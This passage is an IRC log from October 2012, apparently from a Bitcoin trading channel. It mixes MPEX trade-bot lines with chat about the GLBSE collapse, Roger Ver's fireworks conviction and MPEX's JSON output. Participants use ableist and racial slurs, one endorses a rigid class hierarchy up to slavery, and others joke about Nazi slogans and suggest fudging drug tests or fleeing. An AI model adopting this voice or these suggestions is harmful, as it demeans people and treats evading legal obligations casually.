10:12:38 what'd he get that status for? Oct 28 10:14:02 girl dug up a conviction. there will be a post in a few. Oct 28 10:30:16 [MPEX] [S.MPOE] 1600 @ 0.00046335 = 0.7414 BTC [+] Oct 28 10:55:22 [MPEX] [S.MPOE] 10600 @ 0.00046213 = 4.8986 BTC [-] Oct 28 10:56:50 [MPEX] [S.MPOE] 40977 @ 0.00046335 = 18.9867 BTC [+] Oct 28 10:56:54 [MPEX] [S.MPOE] 32100 @ 0.00046482 = 14.9207 BTC [+] Oct 28 10:56:56 [MPEX] [S.MPOE] 668 @ 0.00046744 = 0.3122 BTC [+] Oct 28 10:56:57 [MPEX] [S.MPOE] 31906 @ 0.00046848 = 14.9473 BTC [+] Oct 28 10:56:59 [MPEX] [S.MPOE] 49000 @ 0.00047196 = 23.126 BTC [+] Oct 28 10:57:00 [MPEX] [S.MPOE] 37100 @ 0.00047202 = 17.5119 BTC [+] Oct 28 10:57:01 [MPEX] [S.MPOE] 24590 @ 0.00047259 = 11.621 BTC [+] Oct 28 10:57:02 [MPEX] [S.MPOE] 35500 @ 0.00047283 = 16.7855 BTC [+] Oct 28 10:57:03 [MPEX] [S.MPOE] 48159 @ 0.00047506 = 22.8784 BTC [+] Oct 28 11:02:00 http://www.foxnews.com/us/2012/10/27/worker-at-northwest-indiana-library-discovers-black-powder-gun-hidden-inside/ this is pretty cool Oct 28 11:20:10 this shit's too funny : Oct 28 11:20:10 The woman named “Democrat of The Year” this year by the Jefferson County Democratic Party has been convicted of felony theft by a Jefferson County jury for stealing from a developmentally disabled 71-year-old woman. Oct 28 11:20:23 LOL Oct 28 11:20:37 the fact that its from a retard makes it SO much worse Oct 28 11:20:45 innit Oct 28 11:22:03 [MPEX] [S.MPOE] 11200 @ 0.00046213 = 5.1759 BTC [-] Oct 28 11:22:05 [MPEX] [S.MPOE] 13700 @ 0.00045901 = 6.2884 BTC [-] Oct 28 11:22:47 [MPEX] [S.DICE] 370 @ 0.003375 = 1.2488 BTC [-] Oct 28 11:22:49 [MPEX] [S.DICE] 630 @ 0.00339944 = 2.1416 BTC [+] Oct 28 11:37:48 smickles https://bitcointalk.org/index.php?topic=120969.0 Oct 28 11:40:25 wow freenode is having issues? Oct 28 11:40:30 apparently Oct 28 11:41:24 wow on Ver if true Oct 28 11:41:32 and lucky he did it before sept 11th Oct 28 11:42:14 pest control report? Oct 28 11:42:20 that does not sound like a bomb... Oct 28 11:43:03 it seems they're some sort of firecracker Oct 28 11:43:34 http://www.youtube.com/watch?v=tv3Wvxi6pgU Oct 28 11:44:57 yeah he should not ahve mailed them or sold them on ebay Oct 28 11:45:05 but 10 months in jail for that is harsh Oct 28 11:45:38 realted http://www.cpsc.gov/cpscpub/prerel/prhtml03/03072.html Oct 28 11:46:04 that warning should have made him know better Oct 28 11:46:43 http://www.justice.gov/criminal/cybercrime/press-releases/2002/verPlea.htm Oct 28 11:47:38 i thought that guy was really rich Oct 28 11:47:50 why would he be selling that stuff on ebay Oct 28 11:47:57 also sure its the same guy? Oct 28 11:48:06 roger is not really a unique name Oct 28 11:48:07 [MPEX] [S.MPOE] 30665 @ 0.00045934 = 14.0857 BTC [+] Oct 28 11:48:13 ver is kinda rare however Oct 28 11:49:48 well i dunno, obviously. Oct 28 12:13:37 [MPEX] [S.MPOE] 30073 @ 0.00046327 = 13.9319 BTC [+] Oct 28 12:13:38 [MPEX] [S.MPOE] 15800 @ 0.0004624 = 7.3059 BTC [-] Oct 28 12:13:58 Diablo-D3 Oct 28 12:14:18 wat happened to BFL.FAIL and BFL.SUCC and DMC? Oct 28 12:15:57 it was nefarioed Oct 28 12:16:17 Anduck: hello? Oct 28 12:16:24 what happened to ALL THE FUCKING ASSETS ON GLBSE Oct 28 12:17:20 i mean Oct 28 12:17:22 .. Oct 28 12:17:26 what are you going to do about it? Oct 28 12:18:08 will you just clap ur hands and say hah ahh hahah free mony no need pay cuz nefario'ddd Oct 28 12:18:20 its not the asset issuers responcability to deal with the broker, its the people who used the brokers servces to deal with it Oct 28 12:18:33 go talk to a lawyer about it Oct 28 12:18:42 diablo does not have an good options Oct 28 12:18:44 i had like 1 btc in there... Oct 28 12:18:46 any* Oct 28 12:18:49 well Oct 28 12:18:53 just curious Oct 28 12:18:57 that wtf will happen Oct 28 12:19:09 well i dont know what everyone will do, but asset issuers dont ahve an good options Oct 28 12:19:14 yup Oct 28 12:19:25 Anduck what'd you expect he does ? Oct 28 12:19:51 if he knows who had what asset and how much Oct 28 12:19:59 how does he know this ? Oct 28 12:20:05 nefario? Oct 28 12:20:06 he cant ever "know" he can only trust nefario Oct 28 12:20:16 yes... Oct 28 12:20:24 well nefario never released the data afaik Oct 28 12:20:27 that's same even if GLBSE was up Oct 28 12:20:29 if he trust nefario it opens himself up to others claiming they had it Oct 28 12:20:42 thats why glbse was acting as the broker Oct 28 12:21:02 diable only needs to pay glbse.. glbse then needs to pay out the money Oct 28 12:21:14 dibalo* Oct 28 12:21:36 well yeah Oct 28 12:21:47 but uhh Oct 28 12:22:13 nvm ;_; Oct 28 12:22:57 yeah nefario fucked it all up Oct 28 12:23:07 and now he and all the other glbsers can get their asses sued Oct 28 12:39:43 [MPEX] [S.MPOE] 9100 @ 0.00045978 = 4.184 BTC [-] Oct 28 12:39:48 [MPEX] [S.MPOE] 22798 @ 0.00045934 = 10.472 BTC [-] Oct 28 12:49:27 so what's the word, any asics delivered last week ? what was the hash jump we saw ? Oct 28 12:51:41 Chaaang-Noi: I was reading that https://bitcointalk.org/index.php?topic=120759.20 Oct 28 12:53:02 if I understand it correctly, PPT operators can actually get off that boat by paying the investors back the coin Oct 28 12:56:41 EskimoBob in most cases having repaid everyone with a claim shields you from responsibility Oct 28 12:56:49 in all cases it cuts the eventual punishment significantly. Oct 28 12:56:52 so... that's banal. Oct 28 13:05:07 [MPEX] [S.MPOE] 21100 @ 0.0004592 = 9.6891 BTC [-] Oct 28 13:05:08 [MPEX] [S.MPOE] 6300 @ 0.00045901 = 2.8918 BTC [-] Oct 28 13:09:33 what so banal about that? Oct 28 13:17:44 was bitcoinmax.com guy ever doxed? Oct 28 13:18:48 back Oct 28 13:18:52 Anduck: what Chaaang-Noi said, basically Oct 28 13:18:52 who, zuxxor ? Oct 28 13:18:59 until nefario releases the data, I cant do shit Oct 28 13:19:32 he name is pay.btc Oct 28 13:19:48 Anduck: plus, I bought back half the DMC shares before GLBSE collapsed, and the DI.BFLSC stuff isnt due until after the 31st Oct 28 13:20:17 oki Oct 28 13:30:28 [MPEX] [S.MPOE] 18400 @ 0.00045901 = 8.4458 BTC [-] Oct 28 13:30:30 [MPEX] [S.MPOE] 11659 @ 0.0004583 = 5.3433 BTC [-] Oct 28 13:53:38 Who's Mr. Ver? 10 months in prison sounds about right to me. One of the links talks about him storing the explosives in a residential apartment building and mailing them via US mail. Assuming the products were going all over the country they could have ended up on a plane. At the very minimum he put hundreds of people in mortal or near mortal danger. Oct 28 13:55:30 You can only imagine how many were in his apartment. If there was a fire he'd be lucky to not end up with manslaughter charges at the least. Oct 28 13:55:45 [MPEX] [S.MPOE] 2141 @ 0.0004583 = 0.9812 BTC [-] Oct 28 14:21:28 [MPEX] [S.MPOE] 13600 @ 0.00045777 = 6.2257 BTC [-] Oct 28 14:21:31 [MPEX] [S.MPOE] 5100 @ 0.00045721 = 2.3318 BTC [-] Oct 28 14:21:32 [MPEX] [S.MPOE] 18662 @ 0.00045661 = 8.5213 BTC [-] Oct 28 14:22:47 OneMiner he's a bitcoin enthusiast, been doing things like taking outdoor panels to advertise his acceptance of bitcoin Oct 28 14:23:07 runs a computer parts shop in california, financed bitpay to some degree, lost a lot of money in bitcoinica etc Oct 28 14:23:33 Ahh right on. Thanks. Oct 28 14:47:14 [MPEX] [S.MPOE] 34738 @ 0.00045661 = 15.8617 BTC [-] Oct 28 14:47:18 [MPEX] [S.MPOE] 19462 @ 0.00045634 = 8.8813 BTC [-] Oct 28 15:02:50 EskimoBob i dont know who the investors are.. the only one i deal with is nefaro/glbse Oct 28 15:03:13 no one has a claim vs me... they have claim vs glbse Oct 28 15:12:21 [MPEX] [S.MPOE] 6300 @ 0.00045634 = 2.8749 BTC [-] Oct 28 15:19:31 i never collected money Oct 28 15:19:50 this is why nefario had to shut down glbse Oct 28 15:28:44 sgornick : http://trilema.com/2012/options-consumption-graphs/ graph porn Oct 28 15:38:04 [MPEX] [S.MPOE] 14600 @ 0.00045819 = 6.6896 BTC [+] Oct 28 16:03:22 [MPEX] [S.MPOE] 5838 @ 0.00045634 = 2.6641 BTC [-] Oct 28 16:03:26 [MPEX] [S.MPOE] 30262 @ 0.00045482 = 13.7638 BTC [-] Oct 28 16:04:07 Oh gosh I'm shocked, anarchists don't just *read* the anarchists cookbook some of them actually *cook*?!??! But to then capitalistically *sell* their cooking gasp that is *too* much! Oct 28 16:06:04 I suppose now when all the [...fellows..] hear that I did time for *growing and selling plants* they'lll all move over on the bench to distance themselves from me... Oct 28 16:06:17 ? Oct 28 16:06:45 Chap did time! Selling fireworks by mail. Me all I did was grow plants Oct 28 16:07:08 oh and sell them. growing is only up to 7 years, selling is up to life Oct 28 16:07:59 um Oct 28 16:08:02 (Bench part is an Alicie's Restaurant reference) Oct 28 16:08:04 were you in prison is the idea ? Oct 28 16:08:37 yeah 30 days served on weekends in the trailer outside the actua prison, with time off for good behavior. Oct 28 16:08:53 come in fiday night leave monday morning counts as four days Oct 28 16:08:58 0.0 Oct 28 16:09:02 wtf they do this ? Oct 28 16:09:35 smells nicer than the state's evil weed and causes less cancer, plus might not pay tax! Eeeeeevil! Oct 28 16:09:57 not an approved means of weaning oneself off their evil weed :) Oct 28 16:11:05 hmm maybe weekend countes as 3 days. it counted for more than it really was for sure Oct 28 16:11:40 spent the last weekend at home in house arrest, their was too much weed in the prison so they let folk go home Oct 28 16:14:20 I wasn't even actually proven to sell them, its assumed anyone with two cartons of smokes must be a dealer, no proof needed Oct 28 16:16:06 The one law has nothing to do with the other. Fireworks are explosives and can set fires easily. Guy got 10 months for it. Sounds kosher to me. Oct 28 16:16:42 I was willing to go to supreme court on that as assuming guilt so the dropped the selling charges and gave me 30 days weekends for the cultivation Oct 28 16:17:35 knotwork wait a second. are you talking tobacco or pot ? Oct 28 16:17:39 actually it wasnt even selling charge its worded as possession with intent to sell so is not only assuming guilt its assuming intent **** BEGIN LOGGING AT Sun Oct 28 16:21:18 2012 Oct 28 16:22:52 OneMiner haha for a moment I thought you mean Guy Ffawkes got ten months for it :) Oct 28 16:23:18 Nope Mr. Ver. Who's this Guy? Oct 28 16:23:53 Remember Remember the Fifth of November? Does that rhyme now only refer to some 21st century movie?!?!?! Oct 28 16:24:15 Gunpowder, Treason, and Plot!??! Oct 28 16:25:10 He put fireworks under the Central Bank! (no, wait, just the houses of parliament, maybe not so bad?) Oct 28 16:26:42 they killed that guy... Oct 28 16:26:49 drawn and quartered i think Oct 28 16:28:07 yeah I was prety sure he didn't just get 10 months :) Oct 28 16:28:32 Ummm..... Don't know 'bout the 5th of Nov. Probably heard of it once..... Oct 28 16:28:37 Rings a bell. Oct 28 16:28:44 some big nob was in the houses at the time else maybe it'd've been a misdeameanor or a service to the crown Oct 28 16:29:07 [MPEX] [S.MPOE] 28200 @ 0.00045612 = 12.8626 BTC [+] Oct 28 16:29:24 Oneminer LMGTFY "Gunpowder plot" Oct 28 16:30:18 5th november is almost a national holiday so as never to forget Oct 28 16:30:32 People who choose to solve their problems with explosives are not welcome near me, but I'll take a look at that anyways. ;) Oct 28 16:30:33 maybe actually a national holiday. not sure. maybe just a folk holiday Oct 28 16:30:59 like 4th july Oct 28 16:31:09 yay we nearly got free of crown and parliament! Oct 28 16:32:00 4th july is the more modern one, yay we DID get free of crown and parliament. braggarts. :) Oct 28 16:33:44 The fact that there's still a royal family offends me too. Oct 28 16:34:09 oh gosh I was joking! We burn Guy in effigy on Nov 5th! Sheesh! Oct 28 16:34:26 Sill offended. Oct 28 16:34:29 still Oct 28 16:34:32 Suppose the Queen Mum had been in there!?!?! :) Oct 28 16:35:14 They should do the right thing and become citizens like everybody else instead of what I like to call "super citizens" most equal of the equals, you dig? Oct 28 16:35:32 actually i'm the exact opposite persuasion Oct 28 16:35:42 If you have someone above then it's possible to have others below. It's an argument for slavery in reverse. Oct 28 16:35:42 the pretense that all "are equal" offends me. Oct 28 16:35:47 there should be more priviledged. Oct 28 16:36:03 ^^ read above. Oct 28 16:36:04 Not so sure. Consider voters, bread, and circusses. Having someone trained to the task who can call for a vote of n o confidence seems it could have redeeming virtue Oct 28 16:36:13 OneMiner obviously there should be some below. Oct 28 16:36:32 entire fucking point of life, society and inextricable part of human hapiness : soe being below. Oct 28 16:36:32 So, slavery. It's the natural conclusion, don't you think? Oct 28 16:36:36 sure. Oct 28 16:37:21 Bunch of Americans immigrates and votes in bunch of weirdo gunslinging bible belters I'll be praying yes please King William, call for a frakkin vote of no confidence pronto please its un-British!!! Oct 28 16:37:32 Ha! wouldn't go well for you. You'd be defending and I'm a good shot. :P Oct 28 16:37:43 OneEyed you're a good shot with torches ? Oct 28 16:37:55 plebs don't get expensive smithwork. Oct 28 16:38:04 Ether one, I could use a .22 and get it done as well. Oct 28 16:38:06 Burn OneMiner in effigy! Blow him up with good old Black Powder! Oct 28 16:38:11 a .22 torch ? Oct 28 16:38:26 or a .22 pitchfork Oct 28 16:38:54 Well, I can tell you that if a person tries to put me in a class under them.... their time is limited at that point. Oct 28 16:39:45 no one person tries to put you lol. Oct 28 16:39:49 you either belong there or don't. Oct 28 16:39:50 Also aren't American Presidents more king in practice than, well, the Queen for example? Oct 28 16:39:54 There's already a legal precident for that where I'm from. Oct 28 16:40:04 knotwork no. Oct 28 16:40:14 OneEyed do you have a dayjob ? Oct 28 16:40:17 Checks and balances. Oct 28 16:40:20 Nope. Oct 28 16:40:27 Got some work needs doing? Oct 28 16:40:56 haha no, but it's a simple test for class. there's three classes practically, the homeless, the employed, the idle. Oct 28 16:41:00 in that order. Oct 28 16:41:27 OneMiner you'd insult the fans by refusing a knighthood if you were Mick Jagger or Captain Picard?!?! Oct 28 16:42:05 Though I'd love the idea of being a knight..... I may have to refuse. Oct 28 16:42:52 mircea_popescu is the order right? Homeless on top? Oct 28 16:43:00 Hey wait, Captain Kirk didn't get one? Hmm? Wasnt he too a Shakespearan real stage actor once? Oct 28 16:43:13 homeless on the left :) Oct 28 16:43:24 He was. Talks about how serious he took his roles. Oct 28 16:43:46 And he's not a Knight (yet) ? Oct 28 16:44:08 Also what does being a knight have to do with fans? And why is pop culture grounds for kinghthood? Oct 28 16:44:09 Maybe his galactic skirt-chasing was unknighlt behavior Oct 28 16:44:15 knighthood. Oct 28 16:44:46 Because its British! It doesn't have to make sense it just has to have a stiff upper lip! Sheesh! Oct 28 16:44:51 mircea_popescu then the idle are on top? You've confused me with your list. Oct 28 16:45:02 OneMiner my plan. it works. Oct 28 16:45:44 hahaha Oct 28 16:47:31 Anyways. If the queen is only good for ceremony and drawing in tourists... then let her do that. They can be as royal as they want, just don't use any public monies or lands. Let them follow the same rules as everybody else if these rules are so good. Full disclosure: I'm not a UK citizen. Oct 28 16:48:23 OneMiner re fans, maybe the economy is so bad that selling a few platinum albums or popular movies is all that holds up the entire exchequer Oct 28 16:48:43 Jesus, I hope not... Oct 28 16:48:51 Anyways, it isn't. Oct 28 16:49:14 or, comparing Kirk to Picard for example, its about proper British behavior. (Oops lets forget Sir Mick a moment there) Oct 28 16:50:20 abe its about mollifying the masses by pretending to respect some of their idols Oct 28 16:50:26 s/abe/maybe/ Oct 28 16:50:41 or hey, maybe actually respecting them even Oct 28 16:51:56 Disclaimer: I am a Brit, albeit permanant resident of Halifax NS Canada Oct 28 16:53:15 Maybe part of it is simply that it is personal. They have personal individual person to person responsibility to people Oct 28 16:53:51 it'd be an insult to ask a Brit to swear allegiance to the Queen, hance my not even considering becoming a Canadian citizen Oct 28 16:54:26 I'd have to swear allegiance to the Queen of Canada, which would be an insult to me as a subject of the Queen of Great Britain and Northern Ireland Oct 28 16:54:37 [MPEX] [S.MPOE] 22300 @ 0.00045482 = 10.1425 BTC [-] Oct 28 16:54:37 by birth Oct 28 16:55:32 it's be like implying I am not her loyal subject already!!! :) Oct 28 17:10:39 i summon thee sir mircea_popescu Oct 28 17:10:40 lol Oct 28 17:10:52 lolwut Oct 28 17:11:03 LOL i didn't expect it to work Oct 28 17:11:10 I thought you'd be out getting laid by models Oct 28 17:11:25 since you're more pivelaged than us working class folk Oct 28 17:11:41 im a guy, i only get laid ocasionally. Oct 28 17:11:46 only girls can do it continously. Oct 28 17:13:13 i have a hacker friend like you Oct 28 17:13:21 retired nvidia employee Oct 28 17:13:25 new girl every night Oct 28 17:13:27 lol Oct 28 17:17:15 but in all srsness i think i may fork over money for an mpex account Oct 28 17:18:02 Wow ... https://bitcointalk.org/index.php?topic=119745.msg1303342#msg1303342 ... I wonder if working one's way up from terminal operator in Imperial Bank of Commerce datacentre not allowed to punch cards but allowed to tell keypunch operators what to punch and trusted with the vault keys would be an at all useful start for such a career? Oct 28 17:18:18 valut combination I mean oops Oct 28 17:19:40 http://bitcoinfriday.com/ lol Oct 28 17:19:46 [MPEX] [S.MPOE] 15100 @ 0.00045612 = 6.8874 BTC [+] Oct 28 17:19:49 [MPEX] [S.MPOE] 10214 @ 0.00045646 = 4.6623 BTC [+] Oct 28 17:24:43 ahahaha Oct 28 17:24:56 that's one heck of a post right there knotwork Oct 28 17:25:33 yeah I almost did my shameless self-promoting blurb there but figured here would be more apropos Oct 28 17:26:07 (See what I did there!!?! Its implied its me that worked in CIBC datacentre! <<<<======== !!!! Oct 28 17:26:34 ====>>> Back when we punched cards!!!! <<<====== Oct 28 17:29:47 so are you starting a bitcoinica clone ? Oct 28 17:29:50 Did I mention the time I called my friends from number ten downing street's own switchboard and plugged them into what's on in London in six diffrent languages and the speaking clock? Oct 28 17:30:21 No I am taking over the world (as a loyal subject of King Linus, of course) Oct 28 17:31:20 I am running so far two Open Transactions servers, the only public OT servers so far set up Oct 28 17:31:28 man... how often are you intoxicated while on irc ? honest % Oct 28 17:31:53 actually its been months since I so much as had a beer Oct 28 17:33:55 o ? what sort of disloyal subject are you! Oct 28 17:34:23 Starving datacentre-operator :) Oct 28 17:34:45 haha Oct 28 17:34:49 brewing attracted too many fruitflies landlord made me stop Oct 28 17:35:09 smoke weed instead Oct 28 17:35:27 Dr. Dre has found it pretty profitable Oct 28 17:35:35 unfortunately I told judge I would not cultivate again :( Oct 28 17:36:25 fudge the drug tests and smoke behind closed doors? Oct 28 17:37:18 well not while its still illegal anyway. if I'd gotten a permit before growing it would have been fine. if I'd had the money I maybe even could have bought a bale of legal weed to put on his bench to claim gee sorry I am late filing for a permit Oct 28 17:37:52 hmm or maybe permits werent actually available quite by the trial date they were in the works for sure Oct 28 17:37:54 be a fugitive Oct 28 17:37:56 flee the country Oct 28 17:38:23 I am a Brit, this is a commonwealth country I should not have to flee it! Oct 28 17:38:51 hmm actually maybe there is no commonwealth anymore? I recall in 70's there was talk of getting rid of it Oct 28 17:38:58 if you want to smoke weed like Snoop Doggy you should Oct 28 17:39:07 move to LA Oct 28 17:39:10 cultivate there Oct 28 17:39:40 oh sure I didnt tell judge I would not smoke it! but weed is more or less as expensive an indulgence for a starving datacentre-operator as beer is Oct 28 17:40:08 not if you're a rappers posse, then it's free Oct 28 17:40:15 not if you're in a rapper's posse* Oct 28 17:40:44 hmm around here its tobacco that is free, grams of it lying around in public in ashtrays free for the taking Oct 28 17:41:19 lol Oct 28 17:41:27 Maybe once usage tokens are working in Open Transactions I'll sell some and buy a beer to celebrate Oct 28 17:42:09 I knew a kid once who smoked with Snoop. Apparently snoop carries a qp with him at all times? Anyhow he rolled like 9 cigar style blunts. Oct 28 17:42:17 before a show Oct 28 17:42:36 Even Katt Williams can't out smoke Snoop. Oct 28 17:42:54 well now you also know a kid who once called his friends from number ten downing street switchboard too :) Oct 28 17:43:56 wow how did my nick get lost Oct 28 17:44:53 [MPEX] [S.MPOE] 5124 @ 0.00045646 = 2.3389 BTC [+] Oct 28 17:44:55 [MPEX] [S.MPOE] 34176 @ 0.00045675 = 15.6099 BTC [+] Oct 28 17:45:24 I need to turn off enforce Oct 28 17:45:43 on reconnect if old connect is still present your client appends a number to distinguish new connect, evidently also making sure the number falls into the 9 character nick limit some IRC servers (used to?) enforce Oct 28 17:48:12 well blah Oct 28 17:48:21 need to find an ircop Oct 28 17:48:32 just msg nickserv release Oct 28 17:48:44 i don't remember my password Oct 28 17:48:55 cause I'm like Dori from Finding Nemo Oct 28 17:49:44 omg scamming Oct 28 17:49:57 it has an email address ? i think you can reset it Oct 28 17:50:08 Dori is a scammer? Oct 28 17:52:00 XD Oct 28 17:52:08 I will have an ircop do the automated mailer Oct 28 17:52:17 I never set the flag to reset pass Oct 28 17:52:22 I'm a n00b deal with it Oct 28 17:52:23 lol Oct 28 17:52:24 whine to erry Oct 28 17:52:41 i will Oct 28 17:52:57 erry is nice and resets my password for me because I have short term memory problems Oct 28 18:07:07 thepulledstring: I suggest using keepass like I do Oct 28 18:08:39 > sgornick : http://trilema.com/2012/options-consumption-graphs/ graph porn Oct 28 18:08:40 > This article is available for a fee. Oct 28 18:09:16 ouch you went over limit huh ? Oct 28 18:09:33 hit a proxy! Oct 28 18:10:02 [MPEX] [S.MPOE] 2138 @ 0.00045482 = 0.9724 BTC [-] Oct 28 18:10:04 [MPEX] [S.MPOE] 17762 @ 0.00045462 = 8.075 BTC [-] Oct 28 18:10:55 http://www.schneier.com/blog/archives/2012/10/analysis_of_how.html this is kinda cool Oct 28 18:12:46 "Bitcoin is fundamentally flawed because it is a deflationary system, period." Oct 28 18:12:49 i like these people :D Oct 28 18:14:37 why do you "like them" Oct 28 18:15:13 sir mircea_popescu Oct 28 18:16:56 cause they make me laugh. Oct 28 18:17:01 anyway, writing about it, back in a few Oct 28 18:17:42 American Pie 2 is weird Oct 28 18:24:22 Bankers ought to love bitcoin because being limited in supply it lets them control markets by with-holding medium of exchange as usual plus also possibly unlike gold it can be bubbled to any arbitrary value for use as "reserves" and might be cheaper to store too Oct 28 18:25:19 what makes you think they aren't secretly doing that? Oct 28 18:35:05 [MPEX] [S.MPOE] 8100 @ 0.00045462 = 3.6824 BTC [-] Oct 28 18:49:55 thepulledstring http://trilema.com/2012/the-chain-of-lol/ Oct 28 18:49:57 there you have it. Oct 28 18:57:04 "Overhormonal pubescent boys sometimes conjure this imaginary girl that has no family, no emotions, no expectations, needs no food or water, spends her entire day nude in a closet somewhere eagerly awaiting the amorous attentions of the young magician. The Bitcoin-killing quantum computer seems to share most of its traits with that magnificent dream of early teen years. Maybe it’s actually the same thing." Oct 28 18:57:10 that's a good line Oct 28 19:00:12 [MPEX] [S.MPOE] 12076 @ 0.00045675 = 5.5157 BTC [+] Oct 28 19:00:14 [MPEX] [S.MPOE] 38624 @ 0.00045749 = 17.6701 BTC [+] Oct 28 19:02:25 :P\ Oct 28 19:02:50 Romania must have awesome girls Oct 28 19:03:53 kinda. Oct 28 19:19:13 Reward-Drop ETA: 2012-11-29 11:09:04 Oct 28 19:19:18 already before noon on 29th Oct 28 19:25:42 [MPEX] [S.MPOE] 26538 @ 0.00045462 = 12.0647 BTC [-] Oct 28 19:25:44 [MPEX] [S.MPOE] 20815 @ 0.00045458 = 9.4621 BTC [-] Oct 28 19:25:45 [MPEX] [S.MPOE] 4447 @ 0.00045391 = 2.0185 BTC [-] Oct 28 19:31:35 thanks for the PSA mircea_popescu Oct 28 19:51:00 [MPEX] [S.MPOE] 37218 @ 0.00045391 = 16.8936 BTC [-] Oct 28 19:51:01 [MPEX] [S.MPOE] 15982 @ 0.00045372 = 7.2514 BTC [-] Oct 28 20:16:32 [MPEX] [S.MPOE] 19584 @ 0.0004545 = 8.9009 BTC [+] Oct 28 20:16:34 [MPEX] [S.MPOE] 2501 @ 0.00045373 = 1.1348 BTC [-] Oct 28 20:16:36 [MPEX] [S.MPOE] 13515 @ 0.00045372 = 6.132 BTC [-] Oct 28 20:43:08 [MPEX] [S.MPOE] 50000 @ 0.00045743 = 22.8715 BTC [+] Oct 28 21:08:48 [MPEX] [S.MPOE] 308 @ 0.00045743 = 0.1409 BTC [+] Oct 28 21:08:50 [MPEX] [S.MPOE] 704 @ 0.00045749 = 0.3221 BTC [+] Oct 28 21:08:50 [MPEX] [S.MPOE] 32259 @ 0.00045819 = 14.7808 BTC [+] Oct 28 21:35:01 [MPEX] [S.MPOE] 14302 @ 0.00045932 = 6.5692 BTC [+] Oct 28 21:35:02 [MPEX] [S.MPOE] 2298 @ 0.00045972 = 1.0564 BTC [+] Oct 28 21:35:12 I think its safe to say EskimoBob is well endowed Oct 28 21:35:30 he's always looking for something looser Oct 28 21:36:26 wat? Oct 28 21:40:26 on the forum, he continually rants about stuff that is less tight that he is apparently comfortable with Oct 28 21:40:51 s/that/than Oct 28 21:41:05 haha yes, he similarly bitched about mpex backup Oct 28 21:42:29 anyway, i guess biggest dick around is..er... has mircea Oct 28 21:42:35 cause i'm working on processing STATJSON Oct 28 21:43:21 and i wonder whether they actually tested parsing with misc clients or he just said "do it so" Oct 28 21:43:45 we could infer that EskimoBob find pirate too tight Oct 28 21:44:04 jurov: *make it so Oct 28 21:44:04 as he is interested in pursuing his, looser, brother Oct 28 21:44:28 dates in nonstandard format, all numbers as "strings"... looks like MPExAgent will stay useful Oct 28 21:44:49 thx diablo Oct 28 22:00:16 [MPEX] [S.MPOE] 3729 @ 0.0004584 = 1.7094 BTC [-] Oct 28 22:00:16 [MPEX] [S.MPOE] 1075 @ 0.00045601 = 0.4902 BTC [-] Oct 28 22:00:59 oh and "Header" : [{"key1":"value1"},{"key2":"value2"},..etc..] srsly? Oct 28 22:05:58 that will be converted into "Header" : {"key1":"value1","key2":"value2"} Oct 28 22:06:01 with #remove brain damage Oct 28 22:06:08 comment above it Oct 28 22:09:02 so... i'll appreciate donations of jsonstat samples (can be redacted, i'm just interested in format of all the parts) Oct 28 22:12:07 JSON is fo' haters Oct 28 22:12:09 XML ftw Oct 28 22:13:17 someone pls kick him, that was outrageous flamebait Oct 28 22:14:19 my spine just shivered when trying to imagine what kind of xml would mircea come up with Oct 28 22:14:32 NOPE Oct 28 22:14:34 lol Oct 28 22:15:08 NOPENOPENOPENOPE Oct 28 22:15:10 I thought we was cool jurov Oct 28 22:16:49 nopenopenope Oct 28 22:16:57 already have jsonstat parser for your bots? Oct 28 22:17:18 you're building you're own parser? Oct 28 22:18:00 I use gson for all my json needs Oct 28 22:18:36 i doubt gson or anything will help you with above Oct 28 22:18:47 jurov everything's strings, what dates you talkin about ? Oct 28 22:19:42 jurov: we can perform an experiment for the non standard dates Oct 28 22:20:01 jurov: we can use java.util.SimpleDateFormat Oct 28 22:22:58 for the record : {"Header":[ {"key1":"value1" }, {"key2":"value2" }]} | http://jsonlint.com/ => Valid JSON Oct 28 22:23:05 so NYAH Oct 28 22:23:31 for example javascript Date('Sunday the 28th of October 2012 at 07:11:07 PM') actually does work ... except that it thinks it's local time Oct 28 22:24:44 and "Header:" is valid, i don't take issue with that. just that you have to iterate over it to find date/time Oct 28 22:25:07 yes, it's minor issue. but completely unnecessary one. Oct 28 22:25:09 nyyyaaaaaah Oct 28 22:25:13 nyaaaaaaaah Oct 28 22:25:57 jurov : the header isn't really intended for your use tho Oct 28 22:26:00 you should know who you are Oct 28 22:26:11 that stuff's there for the case you bring a complaint Oct 28 22:26:12 [MPEX] [S.MPOE] 25896 @ 0.0004559 = 11.806 BTC [-] Oct 28 22:27:09 mircea_popescu: wut kind of complaint Oct 28 22:27:21 "dude where's my car" Oct 28 22:27:52 :) Oct 28 22:28:03 according to this PM questions are best posed in bright green capitals with yellow fill Oct 28 22:29:32 I think answers might be in 1pt blue on purple (can you do flashing marquee in m$ office?) Oct 28 22:29:52 i do use that date at least for unit testing Oct 28 22:29:53 anyone here use coinurl ? Oct 28 22:30:25 jurov : you're prolly better off using the time string Oct 28 22:30:36 (13:12) < thepulledstring> XML ftw Oct 28 22:30:39 ^^^ no Oct 28 22:34:23 jurov and iirc the idea was that "everything as string" is the best choice for universal compatibility Oct 28 22:36:04 i'm okay with fractional numbers as strings, that may be necessary to preserve accuracy. but wrapping integers into strings is overkill. Oct 28 22:36:12 overkill saved the cat. Oct 28 22:36:35 nyaaaaaaaan Oct 28 22:37:37 think about the "larger integer than expected" case for instance. Oct 28 22:38:09 (yes, i literally have nasa alumni on the team, they are ruining everyone's weekends with ideas such as "well what if this is used in outerspace") Oct 28 22:39:02 anyway. should i put up a cannonical json response ? Oct 28 22:40:26 at least these integers.. would save me(if not anyone else) some work Oct 28 22:44:42 where's that meme with CAST EVERYTHING Oct 28 22:46:37 thats whats up nigga Oct 28 22:46:46 oh, wrong win Oct 28 22:46:56 lol Oct 28 22:48:05 yo dawg i herd you wanna intagars... Oct 28 22:48:26 perils of four monitors Oct 28 22:50:24 more girlfriends less monitors dubby Oct 28 22:51:08 im a one gf kinda guy these days Oct 28 22:51:29 one gf, one monitor, one fuhrer, one reich! Oct 28 22:51:57 though she has hinted at the possibility of shared vagoo Oct 28 22:52:07 [MPEX] [S.MPOE] 12000 @ 0.00045794 = 5.4953 BTC [+] Oct 28 22:52:29 hers ? Oct 28 22:52:42 nein, sharing another Oct 28 22:52:49 usure? Oct 28 22:53:29 well yes, I think I would enforce a single penis policy but I guess you never know Oct 28 23:17:09 [MPEX] [S.MPOE] 8104 @ 0.00045794 = 3.7111 BTC [+] Oct 28 23:17:12 [MPEX] [S.MPOE] 11900 @ 0.00045555 = 5.421 BTC [-] Oct 28 23:17:14 [MPEX] [S.MPOE] 1 @ 0.00045552 BTC [-] Oct 28 23:21:37 so what was the deal with roger ver? Oct 28 23:22:04 apparently he got 